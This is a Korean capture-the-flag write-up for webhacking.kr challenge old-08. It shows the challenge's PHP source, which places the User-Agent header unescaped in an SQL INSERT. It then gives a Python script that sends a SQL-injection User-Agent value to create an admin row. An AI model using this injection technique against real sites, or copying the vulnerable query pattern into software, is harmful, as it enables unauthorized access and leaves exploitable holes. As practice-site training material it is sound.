# old-08 (350)

첫 화면이다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-Lz-dMrwtMqAFBU1I4I2%2F-Lz-doZkuc6tFyKzcQE6%2Fimage.png?alt=media\&token=872e2e3a-07e8-4405-99c0-a1ab2a3c4cc7)

view-source를 클릭해 본 코드의 일부는 아래와 같다.

```php
<?php
$agent=trim(getenv("HTTP_USER_AGENT"));
$ip=$_SERVER['REMOTE_ADDR'];
if(preg_match("/from/i",$agent)){
  echo("<br>Access Denied!<br><br>");
  echo(htmlspecialchars($agent));
  exit();
}
$db = dbconnect();
$count_ck = mysqli_fetch_array(mysqli_query($db,"select count(id) from chall8"));
if($count_ck[0] >= 70){ mysqli_query($db,"delete from chall8"); }

$result = mysqli_query($db,"select id from chall8 where agent='".addslashes($_SERVER['HTTP_USER_AGENT'])."'");
$ck = mysqli_fetch_array($result);

if($ck){
  echo "hi <b>".htmlentities($ck[0])."</b><p>";
  if($ck[0]=="admin"){
    mysqli_query($db,"delete from chall8");
    solve(8);
  }
}

if(!$ck){
  $q=mysqli_query($db,"insert into chall8(agent,ip,id) values('{$agent}','{$ip}','guest')") or die("query error");
  echo("<br><br>done!  ({$count_ck[0]}/70)");
}
?>
```

`$ck[0]` 값을 `"admin"` 으로 만들기 위해 아래와 같은 코드를 작성해 실행하면 문제가 풀린다.

```python
import urllib.request

URL = 'https://webhacking.kr/challenge/web-08/'
PHPSESSID = 'MY_PHPSESSID'


def query(header):
    req.add_header('User-Agent', header)
    r = urllib.request.urlopen(req)
    content = r.read().decode('utf-8')
    print(content)


req = urllib.request.Request(URL)
req.add_header('Cookie', 'PHPSESSID=' + PHPSESSID)
query("donghyunlee00', '0', 'admin')#")
query("donghyunlee00")
```